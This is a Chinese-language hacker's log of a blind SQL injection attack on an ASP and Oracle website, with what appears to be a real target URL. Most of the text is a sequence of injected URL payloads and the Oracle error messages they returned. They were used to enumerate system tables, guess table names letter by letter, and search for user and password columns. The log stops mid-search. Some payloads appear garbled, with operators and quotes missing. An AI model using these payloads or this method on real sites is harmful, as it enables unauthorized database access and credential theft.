一次对ASP+ORACLE的注入手记 电脑资料

一次对ASP+ORACLE的注入手记 电脑资料 OraOLEDB 错误 80040e14 ORA-00911: invalid character /star.asp，行83 说明过滤了分号， et.kpworld./star.asp?performer=马三立 - OraOLEDB 错误 80004005 ORA-01756: 括号内的字符串没有正确结束 /star.asp，行83 看来存在未过滤单引号问题。 et.kpworld./star.asp?performer=马三立 and 1=1 - 闭和他单引号，正常返回。 and 0(select count(*) from admin) and 1=1 - OraOLEDB 错误 80040e37 ORA-00942: table or view does not exist /star.asp，行83 说明不存在ADMIN这个表. * 下面需要知道ORACLE的系统表： 确定表中行的总数： select num_rows from user_tables where table_name=表名 -存放当前用户所有表 where table_name=表名 selectcolumn_name, from user_tab_columns -存放所有列 where table_name=表名 and 0(select count(*) from all_tables) and 1=1 - 存在！ all_tables是一个系统表,用来存放当前ID和其他用户的所有表 and 0(select count(*) from user_tables) and 1=1 - 返回。有这个系统表，这个表存放当前用户的所有表 and 0(select top 1 table_name from user_tables) and 1=1 - OraOLEDB 错误 80040e14 ORA-00923: FROM keyword not found where expected /star.asp，行83 不支持TOP 1 ?。这种解释好象不太理想。 (经过PINKEYES测试已经确定确实不支持TOP 1) and 0(select count(*) from user_tables where table_nam) and 1=1 - OraOLEDB 错误 80040e14 ORA-00904: invalid column name /star.asp，行83 当语法错误时,会显示无效列名字 and 0(select count(*) from user_tables where table_name) and 1=1 - 语法正确时，成功返回标志,看来四个单引号表示空.接下来是对一些函数的测试： and 0(select count(*) from user_tables where sum(table_name)1) and 1=1 - OraOLEDB 错误 80040e14 ORA-00934: group function is not allowed here /star.asp，行83 组函数不允许在这里。 and 0(select count(*) from user_tables where avg(table_name) and 1=1 - OraOLEDB 错误 80040e14 ORA-00934: group function is not allowed here /star.asp，行83 组函数不允许在这里。 and 0(select to_char(table_name) from user_tables) and%201=1 - OraOLEDB 错误 80004005 ORA-01427: single-row subquery returns more than one row /star.asp，行83 单行的子查询返回多于一行 and 0(select count(*) from user_tables where table_name+1) and%201=1 - OraOLEDB 错误 80040e14 ORA-00920: invalid relational operator /star.asp，行83 测试到这里，下面看看怎么弄出他的表来： and 0(select count(*) from performer) and%201=1 - 成功返回。这里的表是看前面URL猜的. and 0(select count(*) from user_tables where table_name=performer) and%201=1 - 没返回。失败标志。 and%200(select%20count(*)%20from%20user_tables%20where%20table_name=PERFORMER) and%201=1 - 成功了！ 看来这个user_tables表只认识大写字母！ and 0(select count(*) from user_tables where length(table_name)10) and%201=1 - 用length函数确定最长表的位数 and 0(select count(*) from user_tables where length(table_name)=18) and%201=1 - 省略若干步骤，最后确定最长表为18位。 and 0(select count(*) from user_tables where substr(table_name,1,1)=A) and%201=1 - 第一位为A， and 0(select count(*) from user_tables where substr(table_name,1,2)=AD) and%201=1 - 第二位为AD and 0(select count(*) from user_tables where substr(table_name,1,18)=ADMINAUTHORIZATION) and%201=1 - 省略若干，18位的表名为ADMINAUTHORIZATION。 and 1=(select count(*) from user_tables where table_name=ADMINAUTHORIZATION) and%201=1 - 返回。 and 0(select count(*) from user_tables where length(table_name)=2) and%201=1 - 最小表名长度为2 and%200(select%20count(*)%20from%20user_tables%20where%20table_name%20like%20%25user%25)%20and%20%201=1 - 没返回， and%200(select%20count(*)%20from%20user_tables%20where%20table_name%20like%20%25ADMIN%25)%20and%201=1 - and%200(select%20count(*)%20from%20user_tables%20where%20table_name%20like%20%25PER%25) and%201=1 - and%200(select%20count(*)%20from%20user_tables%20where%20table_name%20like%20%25BBS%25)%20and%201=1 - 都成功返回。看来可以利用LIKE猜。 and%200(select%20count(*)%20from%20user_tables%20where%20table_name%20like%25BBS%25%20and%20length(table_name)8) and%201=1 - and%200(select%20count(*)%20from%20user_tables%20where%20table_name%20like%25BBS%25%20and%20length(table_name)10)%20and%201=1 - and%200(select%20count(*)%20from%20user_tables%20where%20table_name%20like%25BBS%25%20and%20length(table_name)=10)%20and%201=1 - 利用LIKE和LENGTH组合猜，马上就能确定长度。 and%200(select%20count(*)%20from%20user_tables%20where%20substr(table_name,1,4)=BBSS)%20and%201=1 - 猜出第四位是S。接下来就是重复劳动了。 and%200(select%20count(*)%20from%20user_tables%20where%20substr(table_name,1,10)=BBSSUBJECT)%20and%201=1 - 猜出来了。BBSSUBJECT and%200(select%20count(*)%20from%20user_tab_columns%20where%20table_name=BBSSUBJECT%20and%20column_name%20like%20%25USER%25)%20and%201=1 - and%200(select%20count(*)%20from%20user_tab_columns%20where%20table_name=BBSSUBJECT%20and%20column_name%20like%20%25USER%25)%20and%201=1 - 没返回，不象是保存用户和密码的表。再来。 and%200(select%20count(*)%20from%20user_tables%20where%20table_name%20like%20%25USER%25)%20and%201=1 - and%200(select%20count(*)%20from%20user_tables%20where%20table_name%20like%20%25USER%25%20and%20length(table_name)10)%20and%201=1 - and%200(select%20count(*)%20from%20user_tables%20where%20table_name%20like%20%25USER%25%20and%20length(table_name)15)%20and%201=1 - and%200(select%20count(*)%20from%20user_tables%20where%20table_name%20like%20%25USER%25%20and%20length(table_name)=15)%20and%201=1 - 确定长度为15。 and%200(select%20count(*)%20from%20user_tables%20where%20substr(table_name,1,1)=U%20and%20length(table_name)=15)%20and%201=1 - and%200(select%20count(*)%20from%20user_tables%20where%20substr(table_name,2,1)=S%20and%20length(table_name)=15)%20and%201=1 - and%200(select%20count(*)%20from%20user_tables%20where%20substr(table_name,-4,4)=USER%20and%20length(table_name)=15)%20and%201=1 - and%200(select%20count(*)%20from%20user_tables%20where%20length(table_name)=15%20and%20substr(table_name,-15,15)=UNSUBSCRIBEUSER)%20and%201=1 - and%200(select%20count(*)%20from%20user_tables%20where%20table_name=UNSUBSCRIBEUSER)%20and%201=1 - 确定表名UNSUBSCRIBEUSER，接下来猜是否有密码字段。 and%200(select%20count(*)%20from%20user_tab_columns%20where%20table_name=UNSUBSCRIBEUSER%20and%20column_name%20like%20%25USER%25)%20and%201=1 - and%200(select%20count(*)%20from%20user_tab_columns%20where%20table_name=UNSUBSCRIBEUSER%20and%20column_name%20like%20%25PASS%25)%20and%201=1 - LIKE PASS